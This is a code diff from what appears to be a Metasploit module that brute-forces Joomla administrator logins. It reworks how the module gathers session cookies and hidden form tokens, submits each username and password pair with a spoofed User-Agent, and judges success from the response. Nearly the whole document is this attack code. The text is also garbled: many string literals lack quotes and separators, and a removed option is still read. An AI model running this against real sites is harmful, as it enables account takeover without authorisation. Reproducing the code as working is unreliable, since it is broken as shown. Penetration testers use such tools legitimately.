@@ -39,15 +39,13 @@ def initialize
3939 OptString . new ( 'USER_VARIABLE' , [ false , "The name of the variable for the user field" , "username" ] ) ,
4040 OptString . new ( 'PASS_VARIABLE' , [ false , "The name of the variable for the password field" , "passwd" ] ) ,
4141 OptString . new ( 'WORD_ERROR' , [ false , "The word of message for detect that login fail" , "mod-login-username" ] ) ,
42- OptString . new ( 'REQUEST_TYPE' , [ false , "Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)" , "POST" ] ) ,
4342 OptString . new ( 'UserAgent' , [ true , 'The HTTP User-Agent sent in the request' , 'Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0' ] ) ,
4443 ] , self . class )
4544
4645 register_autofilter_ports ( [ 80 , 443 ] )
4746 end
4847
4948 def find_auth_uri
50-
5149 if datastore [ 'AUTH_URI' ] && datastore [ 'AUTH_URI' ] . length > 0
5250 paths = [ datastore [ 'AUTH_URI' ] ]
5351 else
@@ -64,9 +62,10 @@ def find_auth_uri
6462 } )
6563
6664 next unless res
67- if res . code == 301 || res . code == 302 && res . headers [ 'Location' ] && res . headers [ 'Location' ] !~ /^http/
65+
66+ if res . redirect? && res . headers [ 'Location' ] && res . headers [ 'Location' ] !~ /^http/
6867 path = res . headers [ 'Location' ]
69- vprint_status ( "Following redirect: #{ path } )
68+ vprint_status ( "#{ rhost } : #{ rport } - Following redirect: #{ path } )
7069 res = send_request_cgi ( {
7170 'uri' => path ,
7271 'method' => 'GET'
@@ -89,27 +88,26 @@ def target_url
8988 end
9089
9190 def run_host ( ip )
92-
91+ vprint_error ( " #{ rhost } : #{ rport } - Searching Joomla authentication URI..." )
9392 @uri = find_auth_uri
9493
95- if ! @uri
96- print_error ( "#{ target_url } No URI found that asks for HTTP authentication" )
94+ if !@uri
95+ vprint_error ( "#{ rhost } : #{ rport } - No URI found that asks for authentication" )
9796 return
9897 end
9998
10099 @uri = "/#{ @uri } if @uri [ 0 , 1 ] != "/"
101100
102- print_status ( "Attempting to login to #{ target_url } )
101+ vprint_status ( " #{ target_url } - Attempting to login... ")
103102
104103 each_user_pass { |user , pass |
105104 do_login ( user , pass )
106105 }
107106 end
108107
109- def do_login ( user = 'admin' , pass = 'admin' )
108+ def do_login ( user , pass )
110109 vprint_status ( "#{ target_url } #{ user } #{ pass } )
111-
112- response = do_http_login ( user , pass )
110+ response = do_web_login ( user , pass )
113111 result = determine_result ( response )
114112
115113 if result == :success
@@ -122,113 +120,86 @@ def do_login(user='admin', pass='admin')
122120 end
123121 end
124122
125- def do_http_login ( user , pass )
123+ def do_web_login ( user , pass )
124+ begin
125+ user_var = datastore [ 'USER_VARIABLE' ]
126+ pass_var = datastore [ 'PASS_VARIABLE' ]
126127
127- @uri_mod = @uri
128+ referer_var = "http://#{ rhost }
129+ ctype = 'application/x-www-form-urlencoded'
128130
129- if datastore [ 'REQUEST_TYPE' ] == "GET"
131+ uid , cval , hidden_value = get_login_cookie
130132
131- @uri_mod = "#{ @uri } #{ user } #{ pass }
133+ if uid
134+ index_cookie = 0
135+ value_cookie = ""
132136
133- begin
134- response = send_request_cgi ( {
135- 'uri' => @uri_mod ,
136- 'method' => datastore [ 'REQUEST_TYPE' ] ,
137- 'username' => user ,
138- 'password' => pass
139- } )
140- return response
141- rescue ::Rex ::ConnectionError
142- vprint_error ( "#{ target_url } )
143- return nil
144- end
145- else
146-
147- begin
148-
149- user_var = datastore [ 'USER_VARIABLE' ]
150- pass_var = datastore [ 'PASS_VARIABLE' ]
137+ uid . each do |val_uid |
138+ value_cookie = value_cookie + "#{ val_uid . strip } #{ cval [ index_cookie ] . strip }
139+ index_cookie = index_cookie +1
140+ end
151141
152- referer_var = "http://#{ rhost }
153- ctype = 'application/x-www-form-urlencoded'
142+ value_cookie = value_cookie
143+ vprint_status ( "Target #{ target_url } #{ value_cookie } #{ hidden_value } )
144+
145+ data = "#{ user_var } #{ user } \
146+ "#{ pass_var } #{ pass } \
147+ "lang=&" \
148+ "option=com_login&" \
149+ "task=login&" \
150+ "return=aW5kZXgucGhw&" \
151+ "#{ hidden_value }
152+
153+ response = send_request_cgi ( {
154+ 'uri' => @uri ,
155+ 'method' => datastore [ 'REQUEST_TYPE' ] ,
156+ 'cookie' => "#{ value_cookie } ,
157+ 'data' => data ,
158+ 'headers' =>
159+ {
160+ 'Content-Type' => ctype ,
161+ 'Referer' => referer_var ,
162+ 'User-Agent' => datastore [ 'UserAgent' ] ,
163+ }
164+ } )
154165
155- uid , cval , hidden_value = get_login_cookie
166+ vprint_status ( " #{ target_url } -> First Response Code : #{ response . code } " )
156167
157- if uid
158- index_cookie = 0
159- value_cookie = ""
168+ if ( response . code == 301 || response . code == 302 || response . code == 303 ) && response . headers [ 'Location' ]
160169
161- uid . each do |val_uid |
162- value_cookie = value_cookie + "#{ val_uid . strip } #{ cval [ index_cookie ] . strip }
163- index_cookie = index_cookie +1
164- end
170+ path = response . headers [ 'Location' ]
171+ print_status ( "Following redirect Response: #{ path } )
165172
166- value_cookie = value_cookie
167- vprint_status ( "Target #{ target_url } #{ value_cookie } #{ hidden_value } )
168-
169- data = "#{ user_var } #{ user } \
170- "#{ pass_var } #{ pass } \
171- "lang=&" \
172- "option=com_login&" \
173- "task=login&" \
174- "return=aW5kZXgucGhw&" \
175- "#{ hidden_value }
176-
177- response = send_request_cgi ( {
178- 'uri' => @uri_mod ,
179- 'method' => datastore [ 'REQUEST_TYPE' ] ,
180- 'cookie' => "#{ value_cookie } ,
181- 'data' => data ,
182- 'headers' =>
183- {
184- 'Content-Type' => ctype ,
185- 'Referer' => referer_var ,
186- 'User-Agent' => datastore [ 'UserAgent' ] ,
187- }
173+ response = send_request_raw ( {
174+ 'uri' => path ,
175+ 'method' => 'GET' ,
176+ 'cookie' => "#{ value_cookie }
188177 } )
189-
190- vprint_status ( "#{ target_url } #{ response . code } )
191-
192- if ( response . code == 301 || response . code == 302 || response . code == 303 ) && response . headers [ 'Location' ]
193-
194- path = response . headers [ 'Location' ]
195- print_status ( "Following redirect Response: #{ path } )
196-
197- response = send_request_raw ( {
198- 'uri' => path ,
199- 'method' => 'GET' ,
200- 'cookie' => "#{ value_cookie }
201- } )
202- end
203-
204- return response
205- else
206- print_error ( "#{ target_url } )
207- return nil
208178 end
209- rescue ::Rex ::ConnectionError
210- vprint_error ( "#{ target_url } )
179+
180+ return response
181+ else
182+ print_error ( "#{ target_url } )
211183 return nil
212184 end
185+ rescue ::Rex ::ConnectionError
186+ vprint_error ( "#{ target_url } )
187+ return nil
213188 end
214189 end
215190
216191 def determine_result ( response )
217-
218192 return :abort unless response . kind_of? Rex ::Proto ::Http ::Response
219193 return :abort unless response . code
220194
221195 if [ 200 , 301 , 302 ] . include? ( response . code )
222-
223- #print_status("Response Code: #{response.body}")
224-
225196 if response . to_s . include? datastore [ 'WORD_ERROR' ]
226197 return :fail
227198 else
228199 return :success
229200 end
230-
231201 end
202+
232203 return :fail
233204 end
234205
@@ -279,7 +250,8 @@ def get_login_cookie
279250
280251 #Get the name of the cookie variable Joomla
281252
282- #print_status("cookie = #{res.headers['Set-Cookie']}")
253+ print_status ( "cookie = #{ res . headers [ 'Set-Cookie' ] } )
254+ print_status ( "cookie 2 = #{ res . get_cookies } )
283255 res . headers [ 'Set-Cookie' ] . split ( ';' ) . each { |c |
284256 if c . split ( '=' ) [ 0 ] . length > 10
285257 uid . push ( c . split ( '=' ) [ 0 ] )
0 commit comments